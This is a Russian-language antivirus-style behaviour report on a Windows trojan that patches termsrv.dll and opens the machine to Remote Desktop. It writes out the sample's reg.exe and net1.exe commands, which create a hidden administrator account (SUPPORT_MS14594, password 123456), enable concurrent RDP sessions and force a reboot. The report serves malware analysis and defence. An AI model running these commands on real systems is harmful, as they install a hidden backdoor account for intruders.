Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\TermDD] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
Заражает следующие исполняемые системные файлы:
- <SYSTEM32>\dllcache\termsrv.dll
Подменяет следующие исполняемые системные файлы:
- <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll.tmp
- <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll
Вредоносные функции:
Запускает на исполнение:
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d "00000001" /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d "00000001" /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d "00000000" /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d "00000000" /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d "00000001" /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d "00000000" /f
- <SYSTEM32>\shutdown.exe -r -f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d "00000005" /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d "00000000" /f\
- <SYSTEM32>\net1.exe accounts /maxpwage:unlimited
- <SYSTEM32>\net1.exe localgroup %USERNAME%s SUPPORT_MS14594 /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installe" /v EnableAdminTSRemote /t REG_DWORD /d "00000001" /f
- <SYSTEM32>\net1.exe user SUPPORT_MS14594 123456 /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_MS14594 /t REG_DWORD /d "00000000" /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v Start /t REG_DWORD /d "00000002" /f
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" SUPPORT_MS14594 /add
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermDD" /v Start /t REG_DWORD /d "00000002" /f
- <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_MS14594 /add
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d "00000001" /f
Пытается завершить работу операционной системы Windows.
Изменения в файловой системе:
Создает следующие файлы:
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\79841F8EF00FBA86D33CC5A47696F165
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\79841F8EF00FBA86D33CC5A47696F165
- <SYSTEM32>\termsrv.dll.tmp
- <SYSTEM32>\termsrv.dll.backup
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\3C83474D61E624A4F9844DF935AFE217
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\3C83474D61E624A4F9844DF935AFE217
- %APPDATA%\Microsoft\CryptnetUrlCache\Content\303572DF538EDD8B1D606185F1D559B8
- %APPDATA%\Microsoft\CryptnetUrlCache\MetaData\303572DF538EDD8B1D606185F1D559B8
Удаляет следующие файлы:
- C:\_@1.tmp
Перемещает следующие системные файлы:
- <SYSTEM32>\termsrv.dll в C:\_@1.tmp
Сетевая активность:
Подключается к:
- 'crl.verisign.com':80
- '20#.#6.232.182':80
- 'wp#d':80
TCP:
Запросы HTTP GET:
- crl.verisign.com/ThawteTimestampingCA.crl
- crl.verisign.com/tss-ca.crl
- wp#d/wpad.dat
- 20#.#6.232.182/pki/crl/products/WindowsPCA.crl
UDP:
- DNS ASK crl.microsoft.com
- DNS ASK crl.verisign.com
- DNS ASK wp#d
- '<IP-адрес в локальной сети>':1035
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: ''
